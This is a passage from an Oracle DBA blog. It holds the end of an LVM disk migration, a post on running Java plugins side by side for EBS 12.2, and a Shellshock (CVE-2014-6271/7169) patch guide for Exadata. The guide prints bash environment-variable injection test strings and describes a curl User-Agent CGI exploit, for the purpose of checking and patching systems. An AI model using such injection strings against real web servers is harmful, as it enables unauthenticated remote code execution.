vgu02 2 1 0 wz--n- 23.99g 12.00g

[root@localhost ~]# vgdisplay vgu02 -v
Using volume group(s) on command line
Finding volume group "vgu02"
--- Volume group ---
VG Name vgu02
System ID
Format lvm2
Metadata Areas 2
Metadata Sequence No 3
VG Access read/write
VG Status resizable
MAX LV 0
Cur LV 1
Open LV 1
Max PV 0
Cur PV 2
Act PV 2
VG Size 23.99 GiB
PE Size 4.00 MiB
Total PE 6142
Alloc PE / Size 3071 / 12.00 GiB
Free PE / Size 3071 / 12.00 GiB
VG UUID 4ajgbO-4yf1-aH7V-DMOv-Q2wf-IlYC-91mzce

--- Logical volume ---
LV Path /dev/vgu02/lvu02
LV Name lvu02
VG Name vgu02
LV UUID qjopJ8-PCHS-ESyJ-C227-zpMH-zkIp-D0jbrV
LV Write Access read/write
LV Creation host, time localhost.localdomain, 2014-10-13 11:09:00 +0300
LV Status available
# open 1
LV Size 12.00 GiB
Current LE 3071
Segments 1
Allocation inherit
Read ahead sectors auto
- currently set to 256
Block device 252:3

--- Physical volumes ---

PV Name /dev/sdb1
PV UUID t8kWWP-F9OE-AeWE-5QYa-RHGR-CaHT-K1tfUf
PV Status allocatable
Total PE / Free PE 3071 / 0
PV Name /dev/sdc1
PV UUID GMSidx-Yorp-NZN0-AYUP-aFF8-m6cf-t1LGj2
PV Status allocatable
Total PE / Free PE 3071 / 3071

[root@localhost ~]# lvconvert -m 1 /dev/vgu02/lvu02 /dev/sdc1 --corelog 

vgu02/lvu02: Converted: 0.4%
vgu02/lvu02: Converted: 2.7%
vgu02/lvu02: Converted: 5.0%
vgu02/lvu02: Converted: 7.1%
vgu02/lvu02: Converted: 9.2%
vgu02/lvu02: Converted: 11.1%
vgu02/lvu02: Converted: 13.3%
vgu02/lvu02: Converted: 15.3%
vgu02/lvu02: Converted: 18.5%
vgu02/lvu02: Converted: 20.8%
vgu02/lvu02: Converted: 23.0%
vgu02/lvu02: Converted: 25.2%
vgu02/lvu02: Converted: 27.4%
vgu02/lvu02: Converted: 29.8%
vgu02/lvu02: Converted: 32.1%
vgu02/lvu02: Converted: 36.2%
vgu02/lvu02: Converted: 38.6%
vgu02/lvu02: Converted: 62.4%
vgu02/lvu02: Converted: 100.0%

[root@localhost ~]# lvconvert -m 0 /dev/vgu02/lvu02 /dev/sdb1

Logical volume lvu02 converted.

[root@localhost ~]# lvs

LV VG Attr LSize Pool Origin Data% Move Log Cpy%Sync Convert
lv_root VolGroup -wi-ao---- 17.51g
lv_swap VolGroup -wi-ao---- 2.00g
lvu02 vgu02 -wi-ao---- 12.00g

[root@localhost ~]# vgreduce vgu02 /dev/sdb1
Removed "/dev/sdb1" from volume group "vgu02"

[root@localhost /]# pvremove /dev/sdb1
Labels on physical volume "/dev/sdb1" successfully wiped,


That is it. The database is still running.
You may unplug the old disk from the server..

EBS 12.2 -- Multiple Java Plugins for different applications on the same Windows PC

In this post, I will explain the complicated process for making multiple Java plugins to work on the Same Windows PC which is used by the EBS clients.

As you know, after your login to EBS , OAF pages works through the server side java. When it comes to the Forms screens, and applet is triggered, and client side java starts to service.
Being a client dependent environment, makes the EBS client's to be managed by the Client Support teams That iss , Client side management becomes mandatory..
Plugin, add-on and browser updates should be under control..
Normally, System administrators or Client Support teams are responsible from these kind of management activities, but when a conflict or a problem occurs; unfortuneatly, this duty remains for Apps Dbas and makes their job even harder..

The job is hard because everything gets updated.. You know, Browser vendor updates their security levels, Java becomes more enhanced in security, code fixes or upgrades break the interoperability and so on..
Everything seems documented, but when it comes to real life, even client side management may become an headache.

I already have a blog post regarding EBS Common Client Problems & Solutions..
http://ermanarslan.blogspot.com.tr/2013/07/ebs-common-client-problems-solutions.html

In another post, I have explained the Security enhancements in Java and their effect to EBS clients..
http://ermanarslan.blogspot.com.tr/2014/04/ebs-and-java-7-security-missing.html

Today, I will explain running multiple Java Plugins for Internet Explorer in EBS clients..
The process is complicated.. Fortuneatly, I have a real life experience about it.

The requirement arises, when you have multiple web applications which require different Java plugins..

In this example;
We had EBS 12.2 , which may be connected using Java Plugin 1.6.0_45 , and another web application which must be connected using Java Plugin 1.7.0_51..
Every user  had  their own PCs, and must be able to work both on EBS and on the other Web Application in their Desktop PCs .
That is , Internet Explorer on a PC should be able to connect and work properly in EBS as well as in another application which requires java 1.7.0_51...

The necessity of being able to connect two different application; have brought an requirement to have two java plugins 1)java plugin 1.6.0_45 and 2)1.7.0_51 coexist in Client's Windows PC.

So far so good.. We might install both of them.. Right?
But what about the decision that IE should make ?
I mean; IE should work properly when the client will choose to connect to EBS and at the same time IE should work properly, even if the client will choose to connect to the other application , which requires java plugin 1.7.0_51..
Note that : The clients browsers were IE 10 32 bit.

First of all, lets answer the following questions:
Does EBS 12.2 work properly in 1.7.0_51? YES
Is the IE - EBS and Java Plugin certified with each other? YES

So why were we afraid?
1.7.0_51 is a high-tech java.. It has new security enhancements, and it will warn the client or it may create problems if the codes/Jars are unsigned..
As you may expect, this environment had unsigned jars in EBS..
I mean the jars were unsigned and there were no near future plans for signing them.

I thought the best approach would be going through the possible scenarios and make a decision to build an action plan after that.

Okay, lets see what we have on our agenda :) ;

1.7.0.51 installed but disabled, 1.6.0.45 installed & enabled :

Even when we have disabled the java plugin 1.7.0.51 and opened the forms we saw that java plugin 1.7.0.51 was trigged ..
It made the security checks and passed the control to 1.6.0.45.. 

So the security baseline thing seemed to work :)

JRE 7 VersionJRE 6 Security Baseline
1.7.0_67
1.7.0_65
1.6.0_81
1.7.0_60
1.7.0_55
1.6.0_75
1.7.0_511.6.0_71
1.7.0_451.6.0_65
1.7.0_40
1.7.0_25
1.6.0_51
1.7.0_211.6.0_45
While making security checks, it asked to question "Do you want to run this application?", which was an expected  one, as it was caused by the security enhancement made in the 1.7.0.51.
The answer could not be cached, and the question was repeated in every new browser session (I mean after closing IE , or opening a new tab -> the question was repeated) 
Note that : the question was related with the code signing, as our customer did not not have signed jars..

Okay, after 1.6.0.45 opened the forms screens, everthing looked normal except one thing.. That is,  when we logged out from the forms and tried to open a new form session without logging out from EBS , we had encountered FRM-92050.. On the other hand, the error was seen in the first try, subsequent tries were successful.

When I analyzed the situation , I conclude that this was caused by an EBS bug.. The bug was there for IE 8, but it seemed applicable for IE 10,too.
"FRM-92050 When Re-Opening Forms using Internet Explorer 8 On 12.2.3 (Doc ID 1932415.1)".. 

So, the patch referenced in the document should fix the issue..

1.7.0.51 installed & enabled , 1.6.0.45 installed & enabled :
In this scenario, 1.7.0.51 was directly triggered, but this time EBS forms sessions were serviced by the 1.7.0.51, not 1.6.0.45..
So the continuation of the story was the same as above..

While making security checks, it asked to question "Do you want to run this application?", which was an expected  one, as it was caused by the security enhancement made in the 1.7.0.51.
The answer could not be cached, and the question was repeated in every new browser session (I mean after closing IE , or opening a new tab, the question was repeated) 
Note that : the question was related with the code signing, as our customer does not have signed jars

Okay, after 1.7.0.51 opened the forms screens, everthing looked normal except one thing.. That is,  when we logged out from the forms and tried to open a new form session without logging out from EBS , we had encountered FRM-92050.. On the other hand, the error was seen in the first try, subsequent tries were successful.

When I analyzed the situation , I conclude that this was caused by an EBS bug.. The bug was there for IE 8, but it seemed applicable for IE 10, too
"FRM-92050 When Re-Opening Forms using Internet Explorer 8 On 12.2.3 (Doc ID 1932415.1)".. 

1.7.0.51 uninstalled and 1.6.0.45 installed

No problems at all.. No security questions regarding the code signing , no forms errors ..
But what about the other application that requires 1.7.0.51 right? :) It will not able work properly..

1.7.0.51 installed and 1.6.0.45 installed, and what if we Switch Java Plugins with a registry update?
It was a good idea to switch the java plugin used by IE according to the application needs. Playing with the windows registry ? Okay I had the stomach for that kind of thing :) at least before this experience:)

I mean, if the user want to login to EBS, he/or she may switch the java plugin to 1.6.0.45 using a req file.. Similarly,  if the user want to log in to the other application, he/or she may switch the java plugin to 1.7.0.51 using the relevant req file..

First of all, messing with windows registry is not a good thing, it is complicated and complex..
Especially if you have to change the configuration of this kind of tightly integrated programs..
When I worked on the registry I saw that IE and Java plugins are tightly integrated, it is not like throw a flip and everything works as you want them to work.. Java plugin related keys were everywhere in registry, and it was hard to make a point shot..

What I did was,

I first installed 1.6.0.45 and exported the reqistry from the Local Machine > Software
Then I installed 1.7.0.51 and imported the req that I exported before the installation , and it worked ! :)
I mean, with this action,  IE started to use 1.6.0.45 even if 1.7.0.51 was installed on the system.
To switch bask to 1.7.0.51 , I made the same but in e opposite way. That is, I imported the req file which was containg the condition of  " Local Machine > Software " (the original condition) at the the java plugin 1.7.0.51 was installed..

So when I switched IE to work with 1.6.0.45,,no problems encountered at all.. No security questions regarding the code signing , no forms errors ..
Also, to make the other application work, I switched the IE to work with 1.7.0.51 ..

I must say that  If it could be analyzed further, a point shot could be made.. I mean only the necessary keys in the reqisty could be updated for such a switch operation..

Anyways.. This approach was working , but it was messy.. Probably unsupported by Microsoft..

Okay, we have seen the scenarios and different approaches above, so what is our conclusion then?

I think the Windows registry update should be considered as a last resort.
The best approach is to apply the patch mentioned above and sign the JARS. The JARS should be signed with a code signing certificate gathered from a CA. If signing JARS are not considered, then the clients should be willing to respond to the security prompts..Nevertheless, the prompt appear only when a new browser session/or lets say new browser tab is opened..

That 's all for now. I hope you find it useful. Feel free to comment..

Thursday, October 2, 2014

EXADATA--Bash Vulnerabilities, CVE-2014-7169 CVE-2014-6271

These vulnerabilities affects Exadata X3's storage + database servers 
Before giving the action plan to correct the bash vulnerabilities in Exadata, lets have a closer look at these vulnerabilities.

CVE-2014-6271:

The vulnerability is in Bash.. It is also called shellshock.

The vulnerability arises when you put the commands after closing the brace that defines a shell function. 
So, when a new bash is spawned, it interprest the environment variable ( function) but also executes the commands coming afterwards.

To check this, following, command may be used;

export erm='() { echo "function erm" ; }; echo "you are affected"; '
[root@osrvdb01 ~]# bash
If you are affected -> 
The output will be : 
you are affected
If you are safe - >
The output will be :
export erm='() { echo "function erm" ; }; echo "you are affected"; '
[root@erpdev ~]# bash
bash: warning: erm: ignoring function definition attempt
bash: error importing function definition for `erm

In Exadata X3, we have GNU bash version 3.2.25 , and it is affected by this vulnerability.

CVE-2014-7169:

The vulnerability is in Bash. It is also called as shellshock. It seems that, it is in the parser and if you can trigger a proper syntax error, you can execute commands using next bash input line.
If you see your current system date in the output of the following commands, it means you are in danger;

env Exa='() { (a)=>\' sh -c "echo date"; cat echo

sh: Exa: line 1: syntax error near unexpected token `='
sh: Exa: line 1: `'
sh: error importing function definition for `Exa'
Wed Oct  1 15:09:38 EEST 2014

So, what happens with the command env Exa='() { (a)=>\' sh -c "echo date"; cat echo is that;

when bash is executed,  it interprets the function definition and try to declare it.. But it fails because it has a syntax error, so actually parser fails when parsing the command.
Altough the parser fails, it behaves like a buggy program.
 "(a)=" makes the parser to fail, but parser leaves the  ">"(redirection) character to be evaluated and also the character "\ (next line)
The redirection character ">" leads the output of echo date redirected to a file named echo.

Okay, so far we have started to get to know the vulnerabilities.
Lets look at the risk ;
Following table includes the risk compatability of these vulnerabilities.

Oracle Linux Risk Matrix
CVE#ComponentProtocolSub-
component
Remote Exploit without Auth.?CVSS VERSION 2.0 RISK (see Risk Matrix Definitions)Supported Versions Affected
Base ScoreAccess VectorAccess ComplexityAuthen-
tication
Confiden-
tiality
IntegrityAvail-
ability
CVE-2014-7169
CVE-2014-6271
CVE-2014-7186
CVE-2014-7187
CVE-2014-6277
CVE-2014-6278
OracleLinuxMultipleBashYes10.0NetworkLowNoneCompleteCompleteComplete4, 5, 6, 7

So as you see above, these vulnerabilities seem remotely exploitable without authentication..
The question comes to mind is ; how this bug can be exploited?

Based on my research, the most common effect seems on CGI. That is, if you are using CGI in your web server , then you may be at risk for Remote Code Execution..

A comprehensible POC was delivered by InvisibleThreat, in the following link; 

In the example given by InvisibleThread, we see that ; 
by using curl and modifiying the user_agent , remote codes can be executed through a web server by getting benefit from the bash vulnerability CVE-2014-6271 ..
The vulnerability arises because the environment variables are set by the web server  and send to every CGI program.

curl -A option is used  to specify the :User-Agent string to be send to the Web Server.
We supply the bad command which benefits from the bash vulnerability and execute what we need to execute without any authentication.. 
That is; Web Server through CGI sets this user-agent in the environment, and while setting the environment our bad environment function decleration comes in to play and our code is executed..

By attacking in this way, attacker can remotely execute its code with the permission of the OS user that runs the web server.. So the attacker can delete the whole Documentroot , and crash the website..(HTTP-404)

Well, we have learned the vulnerabilities, and have seen an example in real life..
Lets take a look what we can do to fix this on Exadata X3;

The vulnerability was reported by Oracle on September 26, 2014 with the title "Security Alert for bash vulnerabilities".
Exadata Storage servers are affected and db nodes are also affected.
Actually, "The MOS document Responses to common Exadata security scan findings (Doc ID 1405320.1)" is what we are looking for..
The action plan for correcting the vulnerabilities in Exadata , is as follows;
Note that : This action plan can be used to correct both of the vulnerabilities: CVE-2014-7169 and CVE-2014-6271
  • In database nodes, obtain and update updated bash package using the following version, or later:
bash-3.2-33.el5_11.4.x86_64
To install this package on DB nodes, the exadata-sun-computenode-exact RPM must be removed first. If using Exadata DB server image version 11.2.3.3.0 or later, first run this command: rpm -e exadata-sun-computenode-exact
Then, use this command on all releases to install the updated rpm.
rpm -Uvh <new bash rpm>
  • To install this package on storage cells (supported as an exception for this CVE only), install using "rpm -Uvh --nodeps <path to bash rpm>"
For solaris, you may obtain fixes via Note 1930090.1 to address this issue.

Note that : ILOM and NM2-36p Infiniband switch patches planned but not yet available.